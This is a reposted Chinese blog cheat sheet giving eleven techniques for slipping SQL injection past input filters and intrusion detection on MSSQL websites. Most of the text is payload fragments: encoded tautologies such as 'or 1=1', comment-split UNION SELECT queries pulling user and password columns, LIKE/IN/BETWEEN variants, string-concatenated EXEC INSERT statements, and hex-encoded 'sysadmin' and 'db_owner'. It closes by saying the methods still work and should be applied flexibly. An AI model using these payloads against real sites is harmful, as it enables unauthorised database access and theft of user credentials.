网站检测之防注入绕过的十一种技巧
轉自http://hi.baidu.com/hack69/blog/item/31c5cfd9651ae63611df9b9d.html
1、運用編碼技術繞過
如URLEncode編碼,ASCII編碼繞過。
例如or 1=1即
%6f%72%20%31%3d%31
而Test也可以為
CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
2、通過空格繞過
如兩個空格代替一個空格,用Tab代替空格等,或者刪除所有空格,如
or'' swords'' =‘swords'',由于mssql的松散性,我們可以把or ''swords'' 之間的空格去掉,并不影響運行。
3、運用字符串判斷代替
用經典的or 1=1判斷繞過,
如
or ''swords'' =''swords''
這個方法就是網上在討論的。
4、通過類型轉換修飾符N繞過
可以說這是一個不錯的想法,他除了能在某種程度上繞過限制,而且還有別的作用,大家自己好好想想吧。關于利用,
如
or ''swords'' = N'' swords''
,大寫的N告訴mssql server字符串作為nvarchar類型,它起到類型轉換的作用,并不影響注射語句本身,但是可以避過基于知識的模式匹配IDS。
5、通過+號拆解字符串繞過
效果值得考證,但畢竟是一種方法。如
or ''swords'' =‘sw'' +'' ords'' ;EXEC(‘IN'' +'' SERT INTO ''+'' …..'' )
6、通過LIKE繞過
以前怎么就沒想到呢?
如
or''swords'' LIKE ''sw''
顯然可以很輕松的繞過“=”“>”的限制……
7、通過IN繞過
與上面的LIKE的思路差不多,
如
or ''swords'' IN (''swords'')
8、通過BETWEEN繞過
如
or ''swords'' BETWEEN ''rw'' AND ''tw''
9、通過>或者<繞過
or ''swords'' > ''sw''
or ''swords'' < ''tw''
or 1<3
……
10、運用注釋語句繞過
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
11、用HEX繞過,一般的IDS都無法檢測出來
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
PS:
以上相關技巧到現在都還是有效果的,部分方法在不同的網站程序中也都是通用的,大家可以靈活運用
轉載于:https://www.cnblogs.com/zthua/archive/2013/01/09/2853289.html
總結
以上是生活随笔為你收集整理的网站检测之防注入绕过的十一种技巧的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 2013-10-5
- 下一篇: ASP.NET数据绑定的记忆碎片